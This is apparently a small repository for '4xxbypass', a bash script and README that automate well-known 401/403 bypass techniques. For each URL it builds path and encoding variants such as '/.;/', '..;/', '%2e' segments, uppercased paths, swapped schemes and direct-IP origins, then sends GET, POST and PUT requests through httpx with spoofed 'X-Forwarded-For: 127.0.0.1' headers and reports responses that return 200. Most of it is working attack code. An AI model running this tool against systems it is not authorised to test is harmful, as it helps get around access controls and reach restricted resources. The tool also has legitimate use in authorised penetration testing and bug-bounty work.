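├── 4xxbypass
└── README.md

/4xxbypass:
--------------------------------------------------------------------------------
#!/bin/bash
#
# 4xxbypass: read URLs on stdin, derive a fixed set of path and scheme
# variants for each one, request every variant with GET, POST and PUT through
# httpx, and print the responses whose status line matches 200.
#
# Usage:    cat urls.txt | 4xxbypass
# Requires: httpx, dig, GNU grep (-P), od, sed, cut, tr, mktemp

#if [ -z $1 ]; then echo "Usage: bypass4xx [URL]"; exit; fi

# Percent-encode every byte of $1 ("api" -> "%61%70%69").
# The value is passed as a printf argument, never as the format string: URLs
# routinely contain "%", which printf would otherwise read as a directive.
# Newlines are stripped from the od output so names longer than one od row
# still produce a single-line result.
percent_encode_all() {
  printf '%s' "$1" | od -An -v -tx1 | tr -d ' \n' | sed 's/../%&/g'
}

# Work file for the generated variants. mktemp gives a private, unpredictable
# path, so the script neither deletes nor appends to a pre-existing
# "4xxpayloads" in the current directory, and two runs in the same directory
# do not mix their lists. The trap removes it on every exit path.
payload_file=$(mktemp) || exit 1
trap 'rm -f -- "$payload_file"' EXIT

# Split stdin on any whitespace, one URL per element. Reading into an array
# (instead of an unquoted $urls expansion) keeps "?" and "*" in a URL from
# being expanded as a glob against the current directory.
mapfile -t urls < <(tr -s '[:space:]' '\n')

for url in "${urls[@]}"; do
  [[ -n $url ]] || continue
  printf 'Doing %s\n' "$url"

  # base = scheme://host, path = everything after it (always starts with "/").
  base=$(printf '%s\n' "$url" | cut -d/ -f1-3)
  path="/$(printf '%s\n' "$url" | cut -d/ -f4-)"
  host=$(printf '%s\n' "$base" | cut -d/ -f3)
  ips=$(dig "$host" +short)

  # Last path segment without its trailing slash, and its first character.
  trimmed=${url%/}
  filename=${trimmed##*/}
  filename1st=${filename:0:1}
  fileurlenc=$(percent_encode_all "$filename")
  fileurlenc1st=$(percent_encode_all "$filename1st")

  payloads=("$url")

  # only the base
  #payloads+=($base)

  if [[ $path == */ ]]; then
    # /api => /api/.
    payloads+=("$base$path.")

    # /api => /api/./
    payloads+=("$base$path./")

    # /api => /api/*
    payloads+=("$base$path*")

    # /api => /api..;/
    payloads+=("$base${path%/}..;/")

    # /api => /api;/
    payloads+=("$base${path%/};/")

    # /api => /api/%20
    payloads+=("$base$path%20")

    # /api => /api/%2e
    payloads+=("$base$path%2e")

    # /api => /api/~
    payloads+=("$base$path~")

    # /api => /api/%09
    payloads+=("$base$path%09")
  else
    # /api => /api/.
    payloads+=("$base$path/.")

    # /api => /api/./
    payloads+=("$base$path/./")

    # /api => /api/*
    payloads+=("$base$path/*")

    # /api => /api..;/
    payloads+=("$base$path..;/")

    # /api => /api;/
    payloads+=("$base$path;/")

    # /api => /api/%20
    payloads+=("$base$path/%20")

    # /api => /api/%2e
    payloads+=("$base$path/%2e")

    # /api => /api/~
    payloads+=("$base$path/~")

    # /api => /api/%09
    payloads+=("$base$path/%09")

    # /api => /api/.json
    payloads+=("$base$path/.json")
  fi

  # /api => /%61%70%69
  # Literal (quoted) match instead of a sed pattern built from the URL, so
  # ".", "&", "[" or "/" in the segment cannot change or break the expression.
  if [[ -n $filename ]]; then
    encoded_path=${path//"$filename"/$fileurlenc}
    payloads+=("$base$encoded_path")
  fi

  # /api => /%61pi
  # Encodes the character after the last "/<first char>" in the path; the
  # path is appended unchanged when that sequence does not occur.
  if [[ -n $filename1st && $path == *"/$filename1st"* ]]; then
    head=${path%"/$filename1st"*}
    tail=${path#"$head/$filename1st"}
    payloads+=("$base$head/$fileurlenc1st$tail")
  else
    payloads+=("$base$path")
  fi

  # /api => /api.json
  payloads+=("$base$path.json")

  # /api => https://IP/api
  # NOTE(review): the pattern only matches addresses whose four octets all
  # have two or more digits; kept as in the original.
  while IFS= read -r origin; do
    [[ -n $origin ]] && payloads+=("$origin$path")
  done < <(printf '%s\n' "$ips" \
    | grep -oP '[0-9]{2,}\.[0-9]{2,}\.[0-9]{2,}\.[0-9]{2,}' \
    | httpx -silent)

  # /api => /.;/api
  payloads+=("$base/.;$path")

  # /api => /api#
  payloads+=("$base$path#")

  # /api => /api?params
  payloads+=("$base$path?gg")

  # /api => /%20/api
  payloads+=("$base$(sed 's#/#/%20/#g' <<<"$path")")

  # /api => /%2e/api
  payloads+=("$base$(sed 's#/#/%2e/#g' <<<"$path")")

  # /api => /API
  payloads+=("$base${path^^}")

  # /api => /./api   (path always starts with "/", so only that slash changes)
  payloads+=("$base/.$path")

  # /api => //api
  payloads+=("$base$(sed 's#/#//#g' <<<"$path")")

  # https => http
  # http => https
  # Only the scheme prefix is swapped; a path that happens to contain "http"
  # is left as it is.
  case $url in
    https://*) payloads+=("http://${url#https://}") ;;
    http://*) payloads+=("https://${url#http://}") ;;
  esac

  # One variant per line; quoted so "*" in a variant is written, not globbed.
  printf '%s\n' "${payloads[@]}" >>"$payload_file"
done

# Options shared by the three request passes.
httpx_args=(
  -silent -status-code -content-length
  -H "X-Forwarded-For: 127.0.0.1"
  -H "X-Forwarded-Host: 127.0.0.1"
  -H "X-Custom-IP-Authorization: 127.0.0.1"
)

# NOTE(review): the grep filter matches "200" anywhere between the first "["
# and the last "]" on a line, so a content length that contains 200 is also
# printed; confirm the status of each reported line before relying on it.
echo "GET:"
httpx "${httpx_args[@]}" <"$payload_file" | grep "\[.*200.*\]"

echo "POST:"
httpx "${httpx_args[@]}" -H "Content-length: 0" -x POST <"$payload_file" | grep "\[.*200.*\]"

echo "PUT:"
httpx "${httpx_args[@]}" -H "Content-length: 0" -x PUT <"$payload_file" | grep "\[.*200.*\]"

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# 4xxbypass

A tool that automates a number of well-known 403/401 bypassing techniques.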

# Usage

`echo "https://target.com/this/is/a/403/page" | 4xxbypass`

`cat urls.txt | 4xxbypass`

# Proof of Concept

![](https://i.imgur.com/jmdkfl1.gif)

# Installation

1. Install httpx if it is not already installed (https://github.com/projectdiscovery/httpx). The script also calls `dig` and uses GNU `grep -P`, so both need to be available.

2. `curl https://raw.githubusercontent.com/Raywando/4xxbypass/main/4xxbypass > /usr/bin/4xxbypass`

3. `chmod +x /usr/bin/4xxbypass`

Note on step 2: the command writes whatever the `main` branch holds at download time straight into a root-owned directory on `PATH`, with no integrity check. Download to an ordinary file first, read it, and pin the URL to a commit you have reviewed before moving it into place.

# Payloads

![](https://i.imgur.com/RfwGwjS.png)

In addition, the following headers are added to every request:
```
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
```

# Reference

https://github.com/KathanP19/HowToHunt/blob/fcd0ce1a0f9e83df08084402dfae02f3a5267ab5/Status_Code_Bypass/403Bypass.md
--------------------------------------------------------------------------------